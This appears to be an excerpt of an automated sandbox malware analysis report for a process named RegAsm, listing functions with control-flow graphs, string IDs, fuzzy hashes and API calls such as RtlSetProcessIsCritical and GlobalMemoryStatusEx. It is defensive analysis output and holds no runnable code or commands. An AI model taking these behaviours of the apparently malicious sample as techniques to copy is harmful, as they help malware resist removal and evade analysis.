                                      control_flow_graph 1851 6600040-660052e 1927 6600a80-6600ab5 1851->1927 1928 6600534-6600544 1851->1928 1932 6600ac1-6600adf 1927->1932 1933 6600ab7-6600abc 1927->1933 1928->1927 1929 660054a-660055a 1928->1929 1929->1927 1931 6600560-6600570 1929->1931 1931->1927 1934 6600576-6600586 1931->1934 1946 6600ae1-6600aeb 1932->1946 1947 6600b56-6600b62 1932->1947 1935 6600ba6-6600bab 1933->1935 1934->1927 1936 660058c-660059c 1934->1936 1936->1927 1938 66005a2-66005b2 1936->1938 1938->1927 1939 66005b8-66005c8 1938->1939 1939->1927 1941 66005ce-66005de 1939->1941 1941->1927 1942 66005e4-66005f4 1941->1942 1942->1927 1944 66005fa-660060a 1942->1944 1944->1927 1945 6600610-6600a7f 1944->1945 1946->1947 1953 6600aed-6600af9 1946->1953 1951 6600b64-6600b70 1947->1951 1952 6600b79-6600b85 1947->1952 1951->1952 1961 6600b72-6600b77 1951->1961 1962 6600b87-6600b93 1952->1962 1963 6600b9c-6600b9e 1952->1963 1958 6600afb-6600b06 1953->1958 1959 6600b1e-6600b21 1953->1959 1958->1959 1972 6600b08-6600b12 1958->1972 1964 6600b23-6600b2f 1959->1964 1965 6600b38-6600b44 1959->1965 1961->1935 1962->1963 1974 6600b95-6600b9a 1962->1974 1963->1935 1964->1965 1977 6600b31-6600b36 1964->1977 1969 6600b46-6600b4d 1965->1969 1970 6600bac-6600bba 1965->1970 1969->1970 1971 6600b4f-6600b54 1969->1971 1978 6600bc1-6600bc2 1970->1978 1979 6600bbc-6600bc0 1970->1979 1971->1935 1972->1959 1983 6600b14-6600b19 1972->1983 1974->1935 1977->1935 1981 6600bc3-6600bc8 1978->1981 1982 6600bc9-6600bce 1978->1982 1979->1978 1981->1982 1985 6600bd0 1982->1985 1986 6600bde 1982->1986 1983->1935 1985->1986 1987 6600bd7-6600bdc 1985->1987 1988 6600be0-6600be1 1986->1988 1987->1988
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660241348.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6600000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $^q$$^q
                                      • API String ID: 0-355816377
                                      • Opcode ID: e8314dd33c768ad41b647ae106ccb31f84655b31feb22cfdc2ab2202179033cb
                                      • Instruction ID: 51dc49d7b88d8583cd3ee00d0db92a09e67d511f54488744b41ac9bb37f2e768
                                      • Opcode Fuzzy Hash: e8314dd33c768ad41b647ae106ccb31f84655b31feb22cfdc2ab2202179033cb
                                      • Instruction Fuzzy Hash: CF526374A10218CFEB54DBA4C894BAEBBB7FF54300F2084A9D10A6B3A5CE359D85DF51
                                      Function 06664700 Relevance: 3.0, Strings: 2, Instructions: 491COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $
                                      • API String ID: 0-3408470258
                                      • Opcode ID: 0c4856db1c35d3ecbf5b648948b58ef026c990c3f3e65f32cd3f4ddc8f20005c
                                      • Instruction ID: 234d4b542ce877077910d7295c8c00c500cb20c50faa1fcd06c9bc76dabe6144
                                      • Opcode Fuzzy Hash: 0c4856db1c35d3ecbf5b648948b58ef026c990c3f3e65f32cd3f4ddc8f20005c
                                      • Instruction Fuzzy Hash: 4B32C370902244DFE750DF9AE248A4EBFF1EF05359F1AD098F0045B262DB75E888CB99
                                      Function 06664710 Relevance: 3.0, Strings: 2, Instructions: 486COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $
                                      • API String ID: 0-3408470258
                                      • Opcode ID: d09270752db7169dbb0238d081804cd1970dcbf116d000e768f9ae82b996c033
                                      • Instruction ID: 9b8fda5d928b2010f76ecfa5d2746f678aee1453ab73e8549c12b64e92c95748
                                      • Opcode Fuzzy Hash: d09270752db7169dbb0238d081804cd1970dcbf116d000e768f9ae82b996c033
                                      • Instruction Fuzzy Hash: 1832B370902244DFE750DF9AE248A4EBFF1EF05359F1AD098F0045B262DB75E889CB99
                                      Function 0668BC20 Relevance: 3.0, Strings: 2, Instructions: 481COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2667 668bc20-668bc32 2668 668bc5c-668bc60 2667->2668 2669 668bc34-668bc55 2667->2669 2670 668bc6c-668bc7b 2668->2670 2671 668bc62-668bc64 2668->2671 2669->2668 2672 668bc7d 2670->2672 2673 668bc87-668bcb3 2670->2673 2671->2670 2672->2673 2677 668bcb9-668bcbf 2673->2677 2678 668bed4-668bf1f 2673->2678 2679 668bd88-668bd8c 2677->2679 2680 668bcc5-668bccb 2677->2680 2709 668bf21 2678->2709 2710 668bf35-668bf41 2678->2710 2682 668bd8e-668bd97 2679->2682 2683 668bdb1-668bdba 2679->2683 2680->2678 2684 668bcd1-668bce0 2680->2684 2682->2678 2686 668bd9d-668bdaf 2682->2686 2689 668bdbc-668bdc8 2683->2689 2690 668bddf-668bde2 2683->2690 2687 668bce6-668bcf2 2684->2687 2688 668bd67-668bd70 2684->2688 2691 668bde5-668bdeb 2686->2691 2687->2678 2693 668bcf8-668bd0f 2687->2693 2688->2678 2692 668bd76-668bd82 2688->2692 2702 668bdd0-668bddc 2689->2702 2690->2691 2691->2678 2695 668bdf1-668be06 2691->2695 2692->2679 2692->2680 2696 668bd1b-668bd2d 2693->2696 2697 668bd11 2693->2697 2695->2678 2700 668be0c-668be1e 2695->2700 2696->2688 2704 668bd2f-668bd35 2696->2704 2697->2696 2700->2678 2703 668be24-668be31 2700->2703 2702->2690 2703->2678 2706 668be37-668be4e 2703->2706 2707 668bd41-668bd47 2704->2707 2708 668bd37 2704->2708 2706->2678 2718 668be54-668be6c 2706->2718 2707->2678 2712 668bd4d-668bd64 2707->2712 2708->2707 2711 668bf24-668bf26 2709->2711 2713 668bf4d-668bf69 2710->2713 2714 668bf43 2710->2714 2716 668bf28-668bf33 2711->2716 2717 668bf6a-668bfa7 2711->2717 2714->2713 2716->2710 2716->2711 2727 668bfa9-668bfac 2717->2727 2728 668bfc3-668bfcf 2717->2728 2718->2678 2719 668be6e-668be79 2718->2719 2722 668beca-668bed1 2719->2722 2723 668be7b-668be85 2719->2723 2723->2722 2729 668be87-668be9d 2723->2729 2730 668bfaf-668bfc1 2727->2730 2731 668bfdb-668c000 2728->2731 2732 668bfd1 2728->2732 2734 668bea9-668bec2 2729->2734 2735 668be9f 2729->2735 2730->2728 2730->2730 2739 668c002-668c008 2731->2739 2740 668c074-668c07a 2731->2740 2732->2731 2734->2722 2735->2734 2739->2740 2744 668c00a-668c00d 2739->2744 2742 668c07c-668c07f 2740->2742 2743 668c0c7-668c0e1 2740->2743 2746 668c0e4-668c125 2742->2746 2747 668c081-668c08e 2742->2747 2745 668c013-668c020 2744->2745 2744->2746 2749 668c06e-668c072 2745->2749 2750 668c022-668c04c 2745->2750 2758 668c12c-668c18a 2746->2758 2759 668c127 2746->2759 2751 668c090-668c0a8 2747->2751 2752 668c0c1-668c0c5 2747->2752 2749->2740 2749->2744 2753 668c058-668c06b 2750->2753 2754 668c04e 2750->2754 2751->2746 2756 668c0aa-668c0bd 2751->2756 2752->2742 2752->2743 2753->2749 2754->2753 2756->2752 2765 668c18c-668c192 2758->2765 2766 668c195-668c19c 2758->2766 2759->2758 2765->2766
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (bq$d
                                      • API String ID: 0-3334038649
                                      • Opcode ID: 2c5d6c96a7adeedb38e0e853d83dd92ecb380fe5c2df0b74e15a35b58c6b32e1
                                      • Instruction ID: 7ae028331eacdf19872d9c52b6543c0830ec2a9e18015a011dca54a6384dff05
                                      • Opcode Fuzzy Hash: 2c5d6c96a7adeedb38e0e853d83dd92ecb380fe5c2df0b74e15a35b58c6b32e1
                                      • Instruction Fuzzy Hash: 7212AA74A006068FCB54DF69C48496ABBF2FF88314B25C669D56AAB765CB30FC41CF90
                                      Function 066638B8 Relevance: 2.7, Strings: 2, Instructions: 227COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (bq$4'^q
                                      • API String ID: 0-3799531831
                                      • Opcode ID: f369c5860ace5741c50e31850f6becde0eedaf9db2b9ce6a16826b6df4be4da1
                                      • Instruction ID: ccd32aeb9078b28e26aaf3d97f9218b31c2e0950bbd46e2581cdc75d661c32bb
                                      • Opcode Fuzzy Hash: f369c5860ace5741c50e31850f6becde0eedaf9db2b9ce6a16826b6df4be4da1
                                      • Instruction Fuzzy Hash: 31818F30B002499FCB48DF6ED84069EBBF6FF89304B2585A9D4199B365EB30DD46CB91
                                      Function 0668C248 Relevance: 2.7, Strings: 2, Instructions: 225COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ($(bq
                                      • API String ID: 0-3446019920
                                      • Opcode ID: 6c917718807ed91c031109980efb2c12e7d8a977577c4610bc0792f4d9b65a86
                                      • Instruction ID: 8ea348f3a1527e80d196c7cbf5c28a2b94f492126fbbd9fb22db0a6ae89a1c39
                                      • Opcode Fuzzy Hash: 6c917718807ed91c031109980efb2c12e7d8a977577c4610bc0792f4d9b65a86
                                      • Instruction Fuzzy Hash: 86917E35A00219DFCB40DFA4D8949AEBBB1FF49311F158269E915AB391C730ED56CFA0
                                      Function 06680040 Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,bq$,bq
                                      • API String ID: 0-2699258169
                                      • Opcode ID: 9ad45df762b4297097f1eba3d9ef10a3a471ed4674e192668652e6567cb4a9b1
                                      • Instruction ID: 8cb1744d2ace820821d0567f398e0f394deccf4e3dd0cefccbdaaf325488ae1b
                                      • Opcode Fuzzy Hash: 9ad45df762b4297097f1eba3d9ef10a3a471ed4674e192668652e6567cb4a9b1
                                      • Instruction Fuzzy Hash: 8971AF74E01218DFCB48DFA9D9849DDBBB2FF88314F248529E815AB364DB30A946CF50
                                      Function 0668D8E7 Relevance: 2.5, Strings: 2, Instructions: 25COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $^q$$^q
                                      • API String ID: 0-355816377
                                      • Opcode ID: 27aaa37c8d5d33bf7342cf4803612742450c7949f537d9e4e14bd4c7afa376a2
                                      • Instruction ID: fc65981472a43799acd51dd7cc3f449fe54b00795297823c8688e26825c6ec55
                                      • Opcode Fuzzy Hash: 27aaa37c8d5d33bf7342cf4803612742450c7949f537d9e4e14bd4c7afa376a2
                                      • Instruction Fuzzy Hash: D2F0D434A0020CDFDB64EF18D494AA87BB5BF44751F108195E9098F354C730AE95CBA0
                                      Function 0133B860 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2654221242.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1330000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 380ca1c6832cdb246e347fac8c7e4311cef9ff006d582cec29d26ee22d322a12
                                      • Instruction ID: 132c89afcbac08931fcabb387048474dbb5a042cb3a9572af71b253c690da9e3
                                      • Opcode Fuzzy Hash: 380ca1c6832cdb246e347fac8c7e4311cef9ff006d582cec29d26ee22d322a12
                                      • Instruction Fuzzy Hash: B841F172E143968FCB14CFB9D4142AEFBF1AFC9310F14866AD548AB251DB389844CB91
                                      Function 01335A4A Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlSetProcessIsCritical.NTDLL(?,?), ref: 01335AE2
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2654221242.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1330000_RegAsm.jbxd
                                      Similarity
                                      • API ID: CriticalProcess
                                      • String ID:
                                      • API String ID: 2695349919-0
                                      • Opcode ID: f29249ede4d1b26e0e557e4554c3279cee7e9efbbde01c406df11491d6d1e3ba
                                      • Instruction ID: ff2b35b2c0b68d1c548d946b67b9ec938f07f110b53f1c1449a5a0674e048b91
                                      • Opcode Fuzzy Hash: f29249ede4d1b26e0e557e4554c3279cee7e9efbbde01c406df11491d6d1e3ba
                                      • Instruction Fuzzy Hash: BB215CB6C01259CFDB14CF9AD880BEEBBF4AF58320F14806AE455A3250C338A944DF65
                                      Function 01335A50 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlSetProcessIsCritical.NTDLL(?,?), ref: 01335AE2
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2654221242.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1330000_RegAsm.jbxd
                                      Similarity
                                      • API ID: CriticalProcess
                                      • String ID:
                                      • API String ID: 2695349919-0
                                      • Opcode ID: 71c637127497e992a95579636425cd6f069ce7412d4b73ad69b2e614daeed463
                                      • Instruction ID: eedbc9ea1d366a7c5464ca861e2eb4dc8b697a1ab08815260bfc136cf296d5fb
                                      • Opcode Fuzzy Hash: 71c637127497e992a95579636425cd6f069ce7412d4b73ad69b2e614daeed463
                                      • Instruction Fuzzy Hash: 6A216DB6C01259CFDB10CF9AD880BEEBBF4AF48320F14806AE455A3250C338A944DF65
                                      Function 0133B2F0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0133B8B2), ref: 0133B99F
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2654221242.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1330000_RegAsm.jbxd
                                      Similarity
                                      • API ID: GlobalMemoryStatus
                                      • String ID:
                                      • API String ID: 1890195054-0
                                      • Opcode ID: b22e3718c6433692050d9c0c7a55ef834b7f6d10928312c6efba53ace1d677c6
                                      • Instruction ID: 93ea27fdafa7d557ce5f8bbd0b3506e29d9df520df8ecd427677f8415f281c5e
                                      • Opcode Fuzzy Hash: b22e3718c6433692050d9c0c7a55ef834b7f6d10928312c6efba53ace1d677c6
                                      • Instruction Fuzzy Hash: FE1100B5C006699BDB10CF9AC544BAEFBF4EB48324F15816AE818B7244D378A944CFA5
                                      Function 0133B930 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0133B8B2), ref: 0133B99F
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2654221242.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1330000_RegAsm.jbxd
                                      Similarity
                                      • API ID: GlobalMemoryStatus
                                      • String ID:
                                      • API String ID: 1890195054-0
                                      • Opcode ID: e701c19b2d649c2d8208c13bce2142088565a75c5a479898e7d8295c63a14eec
                                      • Instruction ID: ad5224bea154f1b3bb5b7f93b491adcea5f502c9fd204260dbe200de15427cef
                                      • Opcode Fuzzy Hash: e701c19b2d649c2d8208c13bce2142088565a75c5a479898e7d8295c63a14eec
                                      • Instruction Fuzzy Hash: 121142B6C00669CBDB10CFAAC5457EEFBB4AF48324F14816AD818B7200D338A954CFA5
                                      Function 0666F568 Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (Acq
                                      • API String ID: 0-1548273396
                                      • Opcode ID: 6d70a07b8962826a5b6a57ea10903941c8cf4d0c76646bcc4b165fefa01be21d
                                      • Instruction ID: 24b8e4a50d33450b6b8a588efef863af41f3c40d38ee863ad21d717f19694b08
                                      • Opcode Fuzzy Hash: 6d70a07b8962826a5b6a57ea10903941c8cf4d0c76646bcc4b165fefa01be21d
                                      • Instruction Fuzzy Hash: F6D1D574E01228CFDB64DFA6E984B9DBBB2BF89304F2081A9E419A7355DB305D85CF50
                                      Function 06663563 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,bq
                                      • API String ID: 0-2474004448
                                      • Opcode ID: 115951c2475069edb308363e11284b178aa648837801db1b83849e27dad76385
                                      • Instruction ID: ee1b36a988d1407e209c6589af6ca324a2c15fd1dcdc0a979fecb26f44a404d3
                                      • Opcode Fuzzy Hash: 115951c2475069edb308363e11284b178aa648837801db1b83849e27dad76385
                                      • Instruction Fuzzy Hash: 7271A270F50205DFDBA49A3BE55453A3AE6AFC9610724646AE402DF370EF21DC46CB92
                                      Function 06689C0B Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q
                                      • API String ID: 0-1614139903
                                      • Opcode ID: 2444e2081558d7ffd4a1253e85812441397add0c872360611970dc2728447396
                                      • Instruction ID: c126127f1632e9fa5acbcc8f972024c3621b6cc2b8397e842c680e08a31cf8bf
                                      • Opcode Fuzzy Hash: 2444e2081558d7ffd4a1253e85812441397add0c872360611970dc2728447396
                                      • Instruction Fuzzy Hash: 4BB1DE78E00259DFCB55DFA8D884AEDBBB2FF48311F20426AE815AB351D730A995CF50
                                      Function 06686B71 Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Pl^q
                                      • API String ID: 0-2831078282
                                      • Opcode ID: 3390c842230b7eb8e8b986c8482632b915ec7494bded0003ef4def07759c790b
                                      • Instruction ID: 4b86a622290a8178b0072bd0ac88bf01c92cfcc5f543ca68f11511ad26c749c7
                                      • Opcode Fuzzy Hash: 3390c842230b7eb8e8b986c8482632b915ec7494bded0003ef4def07759c790b
                                      • Instruction Fuzzy Hash: 8DB161749012288FDBA4DF65D998BDDBBB1BF49300F1081E9D809A7361DB34AE85CF90
                                      Function 06689C28 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q
                                      • API String ID: 0-1614139903
                                      • Opcode ID: 8624435bcd0bd004ec3f00bed83354dc24b7b95567b86e0da7d398c2d468b3c3
                                      • Instruction ID: 913ed0c3f39e23a6d9dda24d212d53901356fece29920ad66e1009b34c11df1f
                                      • Opcode Fuzzy Hash: 8624435bcd0bd004ec3f00bed83354dc24b7b95567b86e0da7d398c2d468b3c3
                                      • Instruction Fuzzy Hash: 2CA19B74D00219DFDB54DFA8D984AADBBF2FF48311F20826AE815AB354DB31A985CF50
                                      Function 066652D0 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (bq
                                      • API String ID: 0-149360118
                                      • Opcode ID: 8ba50019e8a54857c7346b49599e7db0a49987e9ba3eab57bc1c0433dc0bb22a
                                      • Instruction ID: c7c261c675f79f16d99ccfc4cd1c9c53249a6fecabab8cc0f1ba5f6fbe2e7f14
                                      • Opcode Fuzzy Hash: 8ba50019e8a54857c7346b49599e7db0a49987e9ba3eab57bc1c0433dc0bb22a
                                      • Instruction Fuzzy Hash: 5361393AB002159FCB41DF69D880DAABBF6FF8935071580AAE519DB321DB31ED15CB90
                                      Function 06689890 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: PH^q
                                      • API String ID: 0-2549759414
                                      • Opcode ID: 6fae869796147ce43df44c3a2c7f68bf4ec9926adcf2780920868b6a212053f0
                                      • Instruction ID: 3292b0e536268bb68379b0c6eda4e33ee9218bf8cde8eab951247a422870e9fe
                                      • Opcode Fuzzy Hash: 6fae869796147ce43df44c3a2c7f68bf4ec9926adcf2780920868b6a212053f0
                                      • Instruction Fuzzy Hash: 4C818E74E00209DFDF54DFE9D944AADBBB2BF88310F248229E915AB264DB315856CF50
                                      Function 0668F0D9 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Te^q
                                      • API String ID: 0-671973202
                                      • Opcode ID: 30e6293fdd4b36ff11c17d811c87cce012406f953621dde009de2223740ceee2
                                      • Instruction ID: 1dd324cea97b5540492b372236cf68bf033c3c4a5734489a21d309b89224d834
                                      • Opcode Fuzzy Hash: 30e6293fdd4b36ff11c17d811c87cce012406f953621dde009de2223740ceee2
                                      • Instruction Fuzzy Hash: C251D574E00208DFDB54DFA9C954A9DBBF2BF89310F209169E409AB365DB31AD42CF50
                                      Function 06689880 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: PH^q
                                      • API String ID: 0-2549759414
                                      • Opcode ID: 0aa34135d94b095338f17ce0704f2a3d033e16c9fdb2904c4e1b142831a27009
                                      • Instruction ID: a2f31d58b48bdaac6db6fa792171687c432b3c898ad47c8f7e88fd5ddc9f9306
                                      • Opcode Fuzzy Hash: 0aa34135d94b095338f17ce0704f2a3d033e16c9fdb2904c4e1b142831a27009
                                      • Instruction Fuzzy Hash: C451D374E01208DFDB54DFEAD944AAEBBB2FF88310F148229E805AB354DB315956CF50
                                      Function 06601018 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660241348.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6600000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (o^q
                                      • API String ID: 0-74704288
                                      • Opcode ID: 7053e04c2b902c5f27823533849e396602c8c918658b8f4b48403b79451c0110
                                      • Instruction ID: 596790175d4f4180f3d57dec0ad3ceb523b36e9e68c748b1aa1b1ce5d761959a
                                      • Opcode Fuzzy Hash: 7053e04c2b902c5f27823533849e396602c8c918658b8f4b48403b79451c0110
                                      • Instruction Fuzzy Hash: E1419E357042048FDB189FA9D858AAEBBF6BBC9711F14446AE506DB395CF319C02CBA1
                                      Function 0668F0E8 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Te^q
                                      • API String ID: 0-671973202
                                      • Opcode ID: 176ed3d4b6846facb0463668d64bf76b1039ef750f4e576648bfeee13bcc0fb5
                                      • Instruction ID: 4cecf9fe9b0dbddc2e9267bde997b68b67d4de866129fe57e6c4da11b899593d
                                      • Opcode Fuzzy Hash: 176ed3d4b6846facb0463668d64bf76b1039ef750f4e576648bfeee13bcc0fb5
                                      • Instruction Fuzzy Hash: 6E519675E00208DFDB54DFA9C994A9DBBF2BF89310F249129E419AB365DB31AD42CF40
                                      Function 06669EE0 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \;^q
                                      • API String ID: 0-2342212615
                                      • Opcode ID: b1518b8baafeaf65ea869081086f158f74992b14aea759f9c8a24e6a950efa71
                                      • Instruction ID: d5722ffd00912c6463843111aa972de6a6d3c1a54ca3f3edcac5a7e0b82d16fa
                                      • Opcode Fuzzy Hash: b1518b8baafeaf65ea869081086f158f74992b14aea759f9c8a24e6a950efa71
                                      • Instruction Fuzzy Hash: 4A41B274E0021ADFCB44DFAAE544AEEBBF2FB88311F158126E919A7354D7309941CFA0
                                      Function 0660FCF0 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660241348.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6600000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: 172975a020e01d4dd2d00e12922d23ca885995983cd56f0ce5c5257711860059
                                      • Instruction ID: 3ed16e5e31702801e93e00d8f3d3dca51608fd13366f427bb1a007de06a49848
                                      • Opcode Fuzzy Hash: 172975a020e01d4dd2d00e12922d23ca885995983cd56f0ce5c5257711860059
